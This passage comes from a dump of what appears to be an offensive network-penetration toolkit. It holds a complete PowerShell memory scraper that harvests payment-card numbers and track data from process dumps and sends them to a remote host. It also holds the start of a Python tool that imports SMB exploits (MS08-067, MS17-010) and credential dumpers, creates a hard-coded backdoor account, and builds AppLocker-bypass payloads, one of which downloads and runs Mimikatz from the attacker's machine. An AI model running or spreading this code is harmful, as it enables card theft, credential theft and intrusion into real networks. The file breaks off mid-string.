 Sort-Object type,user,pass,vdir,apppool | select user,pass,type,vdir,apppool -Unique       \n        }else{\n\n            # Status user\n            Write-Error \"No application pool or virtual directory passwords were found.\"\n        }     \n    }else{\n        Write-Error \"Appcmd.exe does not exist in the default location.\"\n    }\n\n}\nGet-ApplicationHost\n"
  },
  {
    "path": "modules/mem_scraper.ps1",
    "content": "<#\n.DESCRIPTION\n\n    mem_scraper will continously dump memory of a specified process and search for \n    track data or credit card numbers.\n\n.LINK\n\n    http://www.shellntel.com\n\n.EXAMPLE\n\nmem_scraper.ps1 -Proc iexplore -User bob\n\nDescription\n-----------\nscrapes memory of all IE processes owned by user 'bob'\n\n.EXAMPLE\n\nmem_scraper.ps1 -Proc -NumsOnly -Logging\n\nDescription\n-----------\nscrapes memory of all IE processes for card numbers and writes them to mem_output.txt log file\n\n.EXAMPLE\n\nmem_scraper.ps1 -Proc iexplore -User bob -Bin 123456 -LogHost 192.168.5.5 \n\nDescription\n-----------\nScrapes memory of all IE processes owned by user 'bob'.\nMatches card numbers to specific BIN/IIN number\nBase64 encoded results will be sent via http on port 80 to host 192.168.5.5. \n#>\n[CmdletBinding()]\nParam (\n\n\n    [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)]\n    [String]\n    $Proc,\n\n    [Parameter(Position = 1)]\n    [ValidateScript({ Test-Path $_ })]\n    [String]\n    $DumpFilePath = $env:temp,\n\n    [Parameter(Mandatory=$false)]\n    [String]$LogHost,\n\n    [Parameter(Mandatory=$false)]\n    [string[]]$User,\n\n    [Parameter(Mandatory=$false)]\n    [Switch]$NumsOnly = $False,\n    \n    [Parameter(Mandatory=$false)]\n    [Switch]$Logging,\n\n    [Parameter(Mandatory=$false)]\n    [String]$Bin\n)\n# sourced from the PowerSploit project: https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1\nfunction Out-Minidump\n{\n<#\n.SYNOPSIS\n\n    Generates a full-memory minidump of a process.\n\n    PowerSploit Function: Out-Minidump\n    Author: Matthew Graeber (@mattifestation)\n    License: BSD 3-Clause\n    Required Dependencies: None\n    Optional Dependencies: None\n\n.DESCRIPTION\n\n    Out-Minidump writes a process dump file with all process \n    ory to disk.\n    This is similar to running procdump.exe with the '-ma' switch.\n\n.PARAMETER Process\n\n    Specifies the process for which a dump will be generated. The process object\n    is obtained with Get-Process.\n\n.PARAMETER DumpFilePath\n\n    Specifies the path where dump files will be written. By default, dump files\n    are written to the current working directory. Dump file names take following\n    form: processname_id.dmp\n\n.EXAMPLE\n\n    Out-Minidump -Process (Get-Process -Id 4293)\n\n    Description\n    -----------\n    Generate a minidump for process ID 4293.\n\n.EXAMPLE\n\n    Get-Process lsass | Out-Minidump\n\n    Description\n    -----------\n    Generate a minidump for the lsass process. Note: To dump lsass, you must be\n    running from an elevated prompt.\n\n.EXAMPLE\n\n    Get-Process | Out-Minidump -DumpFilePath C:\\temp\n\n    Description\n    -----------\n    Generate a minidump of all running processes and save them to C:\\temp.\n\n.INPUTS\n\n    System.Diagnostics.Process\n\n    You can pipe a process object to Out-Minidump.\n\n.OUTPUTS\n\n    System.IO.FileInfo\n\n.LINK\n\n    http://www.exploit-monday.com/\n#>\n\n    \n\n    BEGIN\n    {\n        $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')\n        $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')\n        $Flags = [Reflection.BindingFlags] 'NonPublic, Static'\n        $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)\n        $MiniDumpWithFullMemory = [UInt32] 2\n    }\n\n    PROCESS\n    {\n        $Process = $p\n        $ProcessId = $Process.Id\n        $ProcessName = $Process.Name\n        $ProcessHandle = $Process.Handle\n        $ProcessFileName = \"$($ProcessName)_$($ProcessId).dmp\"\n\n        $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName\n\n        $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)\n\n        $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,\n                                                     $ProcessId,\n                                                     $FileStream.SafeFileHandle,\n                                                     $MiniDumpWithFullMemory,\n                                                     [IntPtr]::Zero,\n                                                     [IntPtr]::Zero,\n                                                     [IntPtr]::Zero))\n\n        $FileStream.Close()\n\n        if (-not $Result)\n        {\n            $Exception = New-Object ComponentModel.Win32Exception\n            $ExceptionMessage = \"$($Exception.Message) ($($ProcessName):$($ProcessId))\"\n\n            # Remove any partially written dump files. For example, a partial dump will be written\n            # in the case when 32-bit PowerShell tries to dump a 64-bit process.\n            Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue\n\n            throw $ExceptionMessage\n        }\n        else\n        {\n            Get-ChildItem $ProcessDumpPath\n        }\n    }\n\n    END {}\n}\n\n# luhn test code sourced from: http://scriptolog.blogspot.com/2008/01/powershell-luhn-validation.html\nfunction Test-LuhnNumber([int[]]$digits){\n \n    [int]$sum=0\n    [bool]$alt=$false\n\n    for($i = $digits.length - 1; $i -ge 0; $i--){\n        if($alt){\n            $digits[$i] *= 2\n            if($digits[$i] -gt 9) { $digits[$i] -= 9 }\n        }\n\n        $sum += $digits[$i]\n        $alt = !$alt\n    }\n    \n    return ($sum % 10) -eq 0\n}\n\nfunction Write-Log ($logstring, $color = \"White\")\n{\n    $LogFile = \"$env:temp\\mem_output.txt\"\n    $timestamp = Get-Date\n    if ($Logging) \n\t\t{ Add-Content $LogFile -value \"[$timestamp] - $logstring\" }\n    else \n\t\t{ Write-Host \"[$timestamp] - $logstring\" -ForegroundColor $color }\n}\n\nfunction Send-Cred($cred) {\n    if ($LogHost) {\n        $cred = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($cred.Value))\n        IEX (new-object net.webclient).downloadstring(\"http://$LogHost/$cred\") -ErrorAction SilentlyContinue\n    }\n}\n\nfunction main {\n\n    # save mem dumps to present working directory\n    $dest = $env:temp\n    $cardnumbers = @()\n    \n    #Write-Log \"Starting Scraper\"\n    while (1) {\n        if ($User) {\n            # we use wmi b/c its a v2 safe way of getting process owner\n            $process = (Get-WmiObject win32_process | where{$_.ProcessName -match $Proc})\n            $procs = @()\n            foreach ($p in $process) {\n                foreach ($u in $User) {\n                    if ($p.getowner().User -eq $u) {\n                        $p = Get-Process -Id $p.ProcessId\n                        $procs += $p\n                    }\n                }\n            }\n        }\n        else {\n            $Procs = Get-Process $Proc -ErrorAction SilentlyContinue #| Select -Property Responding\n        }\n        if ($Procs) {\n            #Write-Log \"Target process is running. Dumping memory...\"\n            foreach ($p in $Procs) {\n                Out-Minidump -DumpFilePath $dest\n            }\n            $dumps = Get-ChildItem -Path $dest -Filter *.dmp | select FullName\n            foreach ($d in $dumps) {\n                Write-Log \"Scraping memory dump: $($d.FullName)\"\n                if ($NumsOnly) {\n                    # find plain nums - WARNING: could result in a lot of false postives      \n                    $nums = (Select-String -Path $d.FullName -Pattern \"(4[0-9]{15}|5[1-5][0-9]{14}|3[47][0-9]{13}|6(?:011|5[0-9]{2})[0-9]{12})\" | foreach {$_.matches} | Select-String -NotMatch \"(\\d)\\1{5,}\")\n                }\n                else {\n                    # we default to finding track data  \n                    $nums = (Select-String -Path $d.FullName -Pattern \"\\%B[\\d]{16}[\\^\\w\\s\\/\\d]+\\?\" | foreach {$_.matches})       \n                }\n        \n                foreach ($td in $nums) {\n                    if ($cardnumbers -notcontains $td.Value) {\n                        if ($NumsOnly) {\n                            if ($Bin) {\n                                if ($td -match $Bin) {\n                                    Write-Log \"CARD NUM: $td\" \"green\"\n                                    Send-Cred($td)\n                                }\n                            }\n                            else {\n                                # Luhn test our result before logging\n                                if (Test-LuhnNumber([int[]][string[]][char[]]($td.Value))) {\n                                    Write-Log \"POSSIBLE CARD NUM: $td\" \"green\"\n                                    Send-Cred($td)\n                                }\n                            }\n                        }\n                        else {\n                            Write-Log \"TRACK DATA: $td\" \"green\"\n                            Send-Cred($td)\n                        }\n                    }\n                    $cardnumbers += $td.Value\n                }\n                Remove-Item $d.FullName\n            }\n        }\n        else {\n            Write-Log \"Target process not running\"\n        }\n        Exit\n    }\n}\nmain \n0\n"
  },
  {
    "path": "portia.py",
    "content": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#pip install pymssql\n\nfrom deps.psexec import *\nfrom deps.wmiexec import *\nfrom deps.smbexec import *\nfrom deps.secretsdump import *\nfrom deps.smb_exploit import *\nfrom deps.goldenPac import *\nfrom modules import ms08_067\nfrom modules import ms17_010\nfrom random import randint\n#from deps.ms14_068 import *\nimport nmap\nimport Crypto\nimport pymssql\nimport shutil\nimport argparse\nimport base64\nimport binascii\nimport cmd\nimport commands\nimport glob, subprocess\nimport logging\nimport os\nimport pyasn1\nimport random\nimport re\n#import socket\nimport ipaddress\nimport socket,commands,sys\nimport string\nimport sys\nimport tempfile\nimport threading\nimport time\nimport unicodedata\nimport xmltodict\nfrom Crypto import Cipher\nfrom Crypto import Random\nfrom Crypto.Cipher import AES\nimport Crypto.Cipher.DES\nfrom Crypto.Hash import MD5\nfrom binascii import unhexlify\nfrom dns import reversename, resolver\nfrom impacket import tds, version\nfrom impacket.dcerpc.v5 import transport\nfrom impacket.dcerpc.v5 import transport, rrp, scmr, rpcrt\nfrom impacket.dcerpc.v5.dcom import wmi\nfrom impacket.dcerpc.v5.dcomrt import DCOMConnection\nfrom impacket.dcerpc.v5.dtypes import NULL\nfrom impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY,  RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, RPC_C_AUTHN_LEVEL_NONE\nfrom impacket.examples import logger\nfrom impacket.structure import Structure\nfrom impacket.system_errors import ERROR_NO_MORE_ITEMS\nfrom impacket.tds import TDS_ERROR_TOKEN, TDS_LOGINACK_TOKEN\nfrom impacket.winregistry import hexdump\nfrom netaddr import IPNetwork,IPAddress\nfrom nmb.NetBIOS import NetBIOS\nfrom os import kill\nfrom pyasn1.codec.der import decoder, encoder\nfrom signal import alarm, signal, SIGALRM, SIGKILL\nfrom smb.SMBConnection import SMBConnection as SMBConnection1\n#from socket import * \nfrom struct import *\nfrom struct import unpack\nfrom subprocess import Popen, PIPE \nfrom tabulate import tabulate\nfrom termcolor import colored, cprint\nimport Crypto.Cipher.DES\nfrom shutil import copyfile\nfrom SocketServer import ThreadingMixIn, ForkingMixIn\nfrom BaseHTTPServer import HTTPServer\nfrom SimpleHTTPServer import SimpleHTTPRequestHandler\n\ntry:\n    import pyasn1\nexcept ImportError:\n     logging.critical('This module needs pyasn1 installed')\n     logging.critical('You can get it from https://pypi.python.org/pypi/pyasn1')\n     sys.exit(1)\n\n'''\nPrerequisites\napt install autoconf automake autopoint libtool pkg-config\ngit clone https://github.com/libyal/libesedb.git\ncd libesedb/\n./synclibs.sh\n./autogen.sh\ngit clone https://github.com/csababarta/ntdsxtract\ncd ntdsxtract\npython setup.py install\n'''\n\npathVolatility='/pentest/volatility/'\npathEsedb='/pentest/libesedb/esedbtools/'\npathNTDSExtract='/pentest/ntdsxtract/'\n\noptionMS14068=True\noptionTokenPriv=True\n\namsiMode=False\ndemo=False\ndebugMode=False\nskipMode=False\nobfuscatedMode=False\n\nverbose=False\nrunAllModules=True\nclient_machine_name = 'localpcname'\ntotalAns=\"\"\nvulnStatus=False\napplockerBypass=False\nbold=True\norigScriptPath=os.getcwd()\n\ndomainAdminList=[]\n#domainUserList=[]\n\nlocalUserList=[]\nattemptedCredList=[]\n\ntmpCreateUsername=\"portia\"\ntmpCreatePassword=\"Password1\"\n\npowershellArgs=' -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass '\n\noutputBuffer1 = ''\ntmpRegResultList1 = []\ntmpRegResultList2 = []\ntmpRegResultList3 = []\nhashList=[]\npassList=[]\nuserPassList=[]\nuserHashList=[]\ndaPassList=[]\n\nverbose=False\nnetbiosName=\"\"\nliveList=[]\nipList=[]\nfolderDepth=4\n\ndcCompromised=False\n\nrdpList=[]\nnbList=[]\ndcList=[]\nmssqlList=[]\n\naccessOKHostList=[]\naccessAdmHostList=[]\nuncompromisedHostList=[]\ncompromisedHostList=[]\n\npowershellCmdStart='powershell -Sta -ep bypass -noninteractive -nologo -window hidden '\npowershellArgs=' -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass '\nclass ThreadingSimpleServer(ThreadingMixIn, HTTPServer):\n    pass\n\nclass ForkingSimpleServer(ForkingMixIn, HTTPServer):\n    pass\n\n#class RequestHandler(SimpleHTTPRequestHandler):\n#    def do_GET(self):\n#        print \"here123\"    \n#        #self.send_response(200)\n#        #self.end_headers()\n\nclass colors:\n    def __init__(self):\n        self.green = \"\\033[92m\"\n        self.blue = \"\\033[94m\"\n        self.bold = \"\\033[1m\"\n        self.yellow = \"\\033[93m\"\n        self.red = \"\\033[91m\"\n        self.end = \"\\033[0m\"\ncolor = colors()\n\nclass RemoteOperationsReg:\n\n    def __init__(\n        self,\n        smbConnection,\n        doKerberos,\n        kdcHost=None,\n        ):\n        self.__smbConnection = smbConnection\n        self.__smbConnection.setTimeout(5 * 60)\n        self.__serviceName = 'RemoteRegistry'\n        self.__stringBindingWinReg = r'ncacn_np:445[\\pipe\\winreg]'\n        self.__rrp = None\n        self.__regHandle = None\n\n        self.__doKerberos = doKerberos\n        self.__kdcHost = kdcHost\n\n        self.__disabled = False\n        self.__shouldStop = False\n        self.__started = False\n\n        self.__stringBindingSvcCtl = r'ncacn_np:445[\\pipe\\svcctl]'\n        self.__scmr = None\n\n    def getRRP(self):\n        return self.__rrp\n\n    def __connectSvcCtl(self):\n        rpc = \\\n            transport.DCERPCTransportFactory(self.__stringBindingSvcCtl)\n        rpc.set_smb_connection(self.__smbConnection)\n        self.__scmr = rpc.get_dce_rpc()\n        self.__scmr.connect()\n        self.__scmr.bind(scmr.MSRPC_UUID_SCMR)\n\n    def connectWinReg(self):\n        rpc = \\\n            transport.DCERPCTransportFactory(self.__stringBindingWinReg)\n        rpc.set_smb_connection(self.__smbConnection)\n        self.__rrp = rpc.get_dce_rpc()\n        self.__rrp.connect()\n        self.__rrp.bind(rrp.MSRPC_UUID_RRP)\n\n    def __checkServiceStatus(self):\n        ans = scmr.hROpenSCManagerW(self.__scmr)\n        self.__scManagerHandle = ans['lpScHandle']\n        ans = scmr.hROpenServiceW(self.__scmr, self.__scManagerHandle,\n                                  self.__serviceName)\n        self.__serviceHandle = ans['lpServiceHandle']\n        ans = scmr.hRQueryServiceStatus(self.__scmr,\n                self.__serviceHandle)\n        if ans['lpServiceStatus']['dwCurrentState'] \\\n            == scmr.SERVICE_STOPPED:\n            logging.info('Service %s is in stopped state'\n                         % self.__serviceName)\n            self.__shouldStop = True\n            self.__started = False\n        elif ans['lpServiceStatus']['dwCurrentState'] \\\n            == scmr.SERVICE_RUNNING:\n            logging.debug('Service %s is already running'\n                          % self.__serviceName)\n            self.__shouldStop = False\n            self.__started = True\n        else:\n            raise Exception('Unknown service state 0x%x - Aborting'\n                            % ans['CurrentState'])\n        if self.__started is False:\n            ans = scmr.hRQueryServiceConfigW(self.__scmr,\n                    self.__serviceHandle)\n            if ans['lpServiceConfig']['dwStartType'] == 0x4:\n                logging.info('Service %s is disabled, enabling it'\n                             % self.__serviceName)\n                self.__disabled = True\n                scmr.hRChangeServiceConfigW(self.__scmr,\n                        self.__serviceHandle, dwStartType=0x3)\n            logging.info('Starting service %s' % self.__serviceName)\n            scmr.hRStartServiceW(self.__scmr, self.__serviceHandle)\n            time.sleep(1)\n\n    def enableRegistry(self):\n        self.__connectSvcCtl()\n        self.__checkServiceStatus()\n        self.connectWinReg()\n\n    def __restore(self):\n        if self.__shouldStop is True:\n            logging.info('Stopping service %s' % self.__serviceName)\n            scmr.hRControlService(self.__scmr, self.__serviceHandle,\n                                  scmr.SERVICE_CONTROL_STOP)\n        if self.__disabled is True:\n            logging.info('Restoring the disabled state for service %s'\n                         % self.__serviceName)\n            scmr.hRChangeServiceConfigW(self.__scmr,\n                    self.__serviceHandle, dwStartType=0x4)\n\n    def finish(self):\n        self.__restore()\n        if self.__rrp is not None:\n            self.__rrp.disconnect()\n        if self.__scmr is not None:\n            self.__scmr.disconnect()\n\n\nclass RegHandler:\n\n    def __init__(\n        self,\n        targetIP,\n        domain,\n        username,\n        password,\n        passwordHash,\n        keyName,\n        selectedKey,\n        ):\n        self.__username = username\n        self.__password = password\n        self.__domain = domain\n        self.__action = 'QUERY'\n        self.__lmhash = ''\n        self.__nthash = ''\n        self.__aesKey = None\n        self.__doKerberos = None\n        self.__kdcHost = None\n        self.__smbConnection = None\n        self.__remoteOps = None\n        self.__port = 445\n        self.__keyName = keyName\n        self.__selectedKey = selectedKey\n\n        self.__regValues = {\n            0: 'REG_NONE',\n            1: 'REG_SZ',\n            2: 'REG_EXPAND_SZ',\n            0x3: 'REG_BINARY',\n            0x4: 'REG_DWORD',\n            5: 'REG_DWORD_BIG_ENDIAN',\n            6: 'REG_LINK',\n            7: 'REG_MULTI_SZ',\n            11: 'REG_QWORD',\n            }\n\n        if passwordHash is not None:\n            (self.__lmhash, self.__nthash) = passwordHash.split(':')\n\n    def connect(self, remoteName, remoteHost):\n        self.__smbConnection = SMBConnection2(remoteName, remoteHost,\n                sess_port=int(self.__port))\n\n        if self.__doKerberos:\n            self.__smbConnection.kerberosLogin(\n                self.__username,\n                self.__password,\n                self.__domain,\n                self.__lmhash,\n                self.__nthash,\n                self.__aesKey,\n                self.__kdcHost,\n                )\n        else:\n            try:\n                self.__smbConnection.login(self.__username,\n                        self.__password, self.__domain, self.__lmhash,\n                        self.__nthash)\n            except Exception, e:\n                if 'bad username or authentication information' \\\n                    in str(e):\n                    if len(self.__lmhash) < 1 and len(self.__nthash) \\\n                        < 1:\n                        if [targetIP, 'Access Denied', self.__username\n                            + '|' + self.__password, None] \\\n                            not in tmpRegResultList3:\n                            tmpRegResultList3.append([targetIP,\n                                    'Access Denied', self.__username\n                                    + '|' + self.__password, None])\n                    else:\n                        tmpRegResultList3.append([targetIP,\n                                'Access Denied', 'Invalid credentials: '\n                                 + self.__username + '|'\n                                + self.__lmhash + ':' + self.__nthash,\n                                None])\n\n    def run(self, remoteName, remoteHost):\n        self.connect(remoteName, remoteHost)\n        self.__remoteOps = RemoteOperationsReg(self.__smbConnection,\n                self.__doKerberos, self.__kdcHost)\n\n        try:\n            self.__remoteOps.enableRegistry()\n        except Exception, e:\n\n            # logging.debug(str(e))\n            # logging.warning('Cannot check RemoteRegistry status. Hoping it is started...')\n\n            self.__remoteOps.connectWinReg()\n\n        try:\n            dce = self.__remoteOps.getRRP()\n\n            if self.__action == 'QUERY':\n                results = self.query(dce, self.__keyName,\n                        self.__selectedKey)\n                return (results, True)\n            else:\n                logging.error('Method %s not implemented yet!'\n                              % self.__action)\n        except (Exception, KeyboardInterrupt), e:\n            results = str(e)\n            return (results, False)\n        finally:\n\n            # logging.critical(str(e))\n\n            if self.__remoteOps:\n                self.__remoteOps.finish()\n\n    def query(\n        self,\n        dce,\n        keyName,\n        selectedKey,\n        ):\n\n        # Let's strip the root key\n\n        try:\n            rootKey = keyName.split('\\\\')[0]\n            subKey = '\\\\'.join(keyName.split('\\\\')[1:])\n        except Exception:\n            raise Exception('Error parsing keyName %s' % keyName)\n\n        if rootKey.upper() == 'HKLM':\n            ans = rrp.hOpenLocalMachine(dce)\n        elif rootKey.upper() == 'HKU' or rootKey.upper() == 'HKCU':\n            ans = rrp.hOpenCurrentUser(dce)\n        elif rootKey.upper() == 'HKCR':\n            ans = rrp.hOpenClassesRoot(dce)\n        else:\n            raise Exception('Invalid root key %s ' % rootKey)\n\n        hRootKey = ans['phKey']\n        ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey,\n                                   samDesired=rrp.MAXIMUM_ALLOWED\n                                   | rrp.KEY_ENUMERATE_SUB_KEYS\n                                   | rrp.KEY_QUERY_VALUE)\n        if len(selectedKey) > 0:\n            value = rrp.hBaseRegQueryValue(dce, ans2['phkResult'],\n                    str(selectedKey))\n            return str(value[1])\n        else:\n            entriesList = self.__print_all_entries(dce, subKey + '\\\\',\n                    ans2['phkResult'], 0)\n            return entriesList\n\n    def __print_key_values(self, rpc, keyHandler):\n        i = 0\n        resultList = []\n        while True:\n            try:\n                ans4 = rrp.hBaseRegEnumValue(rpc, keyHandler, i)\n                lp_value_name = (ans4['lpValueNameOut'])[:-1]\n                if len(lp_value_name) == 0:\n                    lp_value_name = '(Default)'\n                lp_type = ans4['lpType']\n                lp_data = ''.join(ans4['lpData'])\n\n                # here1\n\n                print '\\t' + lp_value_name + '\\t' \\\n                    + self.__regValues.get(lp_type, 'KEY_NOT_FOUND') \\\n                    + '\\t',\n\n                # print lp_value_name+\"\\t\"+self.__regValues.get(lp_type, 'KEY_NOT_FOUND')\n                # resultList.append('\\t' + lp_value_name + '\\t' + self.__regValues.get(lp_type, 'KEY_NOT_FOUND') + '\\t',)\n\n                self.__parse_lp_data(lp_type, lp_data)\n                i += 1\n            except rrp.DCERPCSessionError, e:\n                if e.get_error_code() == ERROR_NO_MORE_ITEMS:\n                    break\n        return resultList\n\n    def __print_all_entries(\n        self,\n        rpc,\n        keyName,\n        keyHandler,\n        index,\n        ):\n        index = 0\n        resultList = []\n        while True:\n            try:\n                subkey = rrp.hBaseRegEnumKey(rpc, keyHandler, index)\n                index += 1\n                ans = rrp.hBaseRegOpenKey(rpc, keyHandler,\n                        subkey['lpNameOut'],\n                        samDesired=rrp.MAXIMUM_ALLOWED\n                        | rrp.KEY_ENUMERATE_SUB_KEYS)\n                newKeyName = keyName + (subkey['lpNameOut'])[:-1] + '\\\\'\n\n                # print newKeyName\n\n                resultList.append((subkey['lpNameOut'])[:-1])\n            except rrp.DCERPCSessionError, e:\n\n                # self.__print_key_values(rpc, ans['phkResult'])\n                # self.__print_all_subkeys_and_entries(rpc, newKeyName, ans['phkResult'], 0)\n\n                if e.get_error_code() == ERROR_NO_MORE_ITEMS:\n                    break\n            except rpcrt.DCERPCException, e:\n                if str(e).find('access_denied') >= 0:\n                    logging.error('Cannot access subkey %s, bypassing it'\n                                   % (subkey['lpNameOut'])[:-1])\n                    continue\n                elif str(e).find('rpc_x_bad_stub_data') >= 0:\n                    logging.error('Fault call, cannot retrieve value for %s, bypassing it'\n                                   % (subkey['lpNameOut'])[:-1])\n                    return\n                raise\n        return resultList\n\n    def __print_all_subkeys_and_entries(\n        self,\n        rpc,\n        keyName,\n        keyHandler,\n        index,\n        ):\n        index = 0\n        while True:\n            try:\n                subkey = rrp.hBaseRegEnumKey(rpc, keyHandler, index)\n                index += 1\n                ans = rrp.hBaseRegOpenKey(rpc, keyHandler,\n                        subkey['lpNameOut'],\n                        samDesired=rrp.MAXIMUM_ALLOWED\n                        | rrp.KEY_ENUMERATE_SUB_KEYS)\n                newKeyName = keyName + (subkey['lpNameOut'])[:-1] + '\\\\'\n\n                # print newKeyName\n\n                self.__print_key_values(rpc, ans['phkResult'])\n                self.__print_all_subkeys_and_entries(rpc, newKeyName,\n                        ans['phkResult'], 0)\n            except rrp.DCERPCSessionError, e:\n                if e.get_error_code() == ERROR_NO_MORE_ITEMS:\n                    break\n            except rpcrt.DCERPCException, e:\n                if str(e).find('access_denied') >= 0:\n                    logging.error('Cannot access subkey %s, bypassing it'\n                                   % (subkey['lpNameOut'])[:-1])\n                    continue\n                elif str(e).find('rpc_x_bad_stub_data') >= 0:\n                    logging.error('Fault call, cannot retrieve value for %s, bypassing it'\n                                   % (subkey['lpNameOut'])[:-1])\n                    return\n                raise\n\n    @staticmethod\n    def __parse_lp_data(valueType, valueData):\n        try:\n            if valueType == rrp.REG_SZ or valueType \\\n                == rrp.REG_EXPAND_SZ:\n                if type(valueData) is int:\n                    print 'NULL'\n                else:\n                    print '%s' % valueData.decode('utf-16le')[:-1]\n            elif valueType == rrp.REG_BINARY:\n                print ''\n                hexdump(valueData, '\\t')\n            elif valueType == rrp.REG_DWORD:\n                print '0x%x' % unpack('<L', valueData)[0]\n            elif valueType == rrp.REG_QWORD:\n                print '0x%x' % unpack('<Q', valueData)[0]\n            elif valueType == rrp.REG_NONE:\n                try:\n                    if len(valueData) > 1:\n                        print ''\n                        hexdump(valueData, '\\t')\n                    else:\n                        print ' NULL'\n                except:\n                    print ' NULL'\n            elif valueType == rrp.REG_MULTI_SZ:\n                print '%s' % valueData.decode('utf-16le')[:-2]\n            else:\n                print 'Unkown Type 0x%x!' % valueType\n                hexdump(valueData)\n        except Exception, e:\n            logging.debug('Exception thrown when printing reg value %s'\n                          , str(e))\n            print 'Invalid data'\n\ndef getNetBiosName(ip):\n    n = NetBIOS(broadcast=True, listen_port=0)\n    netbiosName=''\n    try:\n        netbiosName=n.queryIPForName(ip)[0]\n    except Exception:\n        pass\n    return netbiosName\n\ndef cleanUp():\n    import glob, os\n    for f in glob.glob(origScriptPath+\"/modules/*.bat\"):\n        os.remove(f)    \n\ndef encodeJavaScript(str1):\n    str2=''\n    for ch in str1:\n        str2+=\"\\\\x\"+str([ch.encode(\"hex\")][0])\n    return str2\n'''\ndef appLockerBypass1(targetIP, domain, username, password, passwordHash,cmd):\n    print (setColor(\"[*]\", bold, color=\"blue\"))+\" \"+targetIP+\":445 \"+(setColor(\"[applocker]  \", color=\"green\"))+\" | AppLocker Bypass Technique 1\"    \n    str1='cmd /k cd C:\\ & \\\\\\\\'+myIP+'\\\\Guest\\\\powershell.exe \\\"IEX (New-Object Net.WebClient).DownloadString(\\'http://'+myIP+':8000/Invoke-Mimikatz.ps1\\'); Invoke-Mimikatz -DumpCreds | Out-File \\\\\\\\'+myIP+'\\\\guest\\\\'+targetIP+'_mimikatz.txt\\\"'\n    if debugMode==True:\n        print str1\n    str2=encodeJavaScript(str1)\n    if debugMode==True:\n        print str2\n    query= ('<?XML version=\"1.0\"?>\\n'\n        '<scriptlet>\\n'\n        '<registration\\n'\n        'progid=\"Pentest\"\\n'\n        'classid=\"{F0001111-0000-0000-0000-0000FEEDACDC}\" >\\n'\n        '<script language=\"JScript\">\\n'\n        '<![CDATA[\\n'\n        'var _0xb453=[\"'+str2+'\",\"\\\\x57\\\\x53\\\\x63\\\\x72\\\\x69\\\\x70\\\\x74\\\\x2E\\\\x53\\\\x68\\\\x65\\\\x6C\\\\x6C\"];var r= new ActiveXObject(_0xb453[1]).Run(_0xb453[0])'\n        ']]>\\n'\n        '</script>\\n'\n        '</registration>\\n'\n        '</scriptlet>\\n')\n    tmpPath=origScriptPath+\"/loot/\"\n    f = open(tmpPath+'payload.sct', 'w')\n    f.write(query)\n    f.close()\n    if getCPUType(targetIP,domain,username,password,passwordHash)==True:\n        filename='C:\\Windows\\Microsoft.NET\\Framework\\\\v4.0.30319\\msbuild.exe'\n        #filename='C:\\Windows\\Microsoft.NET\\Framework64\\\\v4.0.30319\\msbuild.exe'\n    else:\n        filename='C:\\Windows\\Microsoft.NET\\Framework64\\\\v4.0.30319\\msbuild.exe'\n        #filename='C:\\Windows\\Microsoft.NET\\Framework\\\\v4.0.30319\\msbuild.exe'\n    cmd = 'dir '+filename   \n    results=runWMIEXEC(targetIP, domain, username, password, passwordHash,cmd) \n    if \"The system cannot find the file specified\" not in results:\n        cmd = 'regsvr32 /u /n /s /i:http://'+myIP+':8000/payload.sct scrobj.dll'\n        if debugMode==True:\n            print cmd\n        results=runWMIEXEC(targetIP, domain, username, password, passwordHash,cmd) \n        if debugMode==True: \n            print results\n'''\ndef appLockerBypass2(targetIP, domain, username, password, passwordHash,cmd):    \n    print (setColor(\"[*]\", bold, color=\"blue\"))+\" \"+targetIP+\":445 | \"+(setColor(\"[applocker]\", color=\"green\"))+\" | AppLocker Bypass Technique 2\"    \n    query= ('<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\\n'\n    '  <Target Name=\"Hello\">\\n'\n    '   <FragmentExample />\\n'\n    '   <ClassExample />\\n'\n    '  </Target>\\n'\n    '  <UsingTask\\n'\n    '    TaskName=\"FragmentExample\"\\n'\n    '    TaskFactory=\"CodeTaskFactory\"\\n'\n    '    AssemblyFile=\"C:\\Windows\\Microsoft.Net\\Framework\\\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll\" >\\n'\n    '    <ParameterGroup/>\\n'\n    '    <Task>\\n'\n    '      <Using Namespace=\"System\" />\\n'\n    '     <Using Namespace=\"System.IO\" />\\n'\n    '      <Code Type=\"Fragment\" Language=\"cs\">\\n'\n    '        <![CDATA[\\n'\n    '               Console.WriteLine(\"Hello From Fragment\");\\n'\n    '        ]]>\\n'\n    '      </Code>\\n'\n    '    </Task>\\n'\n    '   </UsingTask>\\n'\n    '   <UsingTask\\n'\n    '    TaskName=\"ClassExample\"\\n'\n    '    TaskFactory=\"CodeTaskFactory\"\\n'\n    '    AssemblyFile=\"C:\\Windows\\Microsoft.Net\\Framework\\\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll\" >\\n'\n    '   <Task>\\n'\n    '     <Reference Include=\"System.Management.Automation\" />\\n'\n    '      <Code Type=\"Class\" Language=\"cs\">\\n'\n    '        <![CDATA[\\n'\n    '       \\n'\n    '           using System;\\n'\n    '           using System.IO;\\n'\n    '           using System.Diagnostics;\\n'\n    '           using System.Reflection;\\n'\n    '           using System.Runtime.InteropServices;\\n'\n    '           //Add For PowerShell Invocation\\n'\n    '           using System.Collections.ObjectModel;\\n'\n    '           using System.Management.Automation;\\n'\n    '           using System.Management.Automation.Runspaces;\\n'\n    '           using System.Text;\\n'\n    '           using Microsoft.Build.Framework;\\n'\n    '           using Microsoft.Build.Utilities;\\n'\n    '                           \\n'\n    '           public class ClassExample :  Task, ITask\\n'\n    '           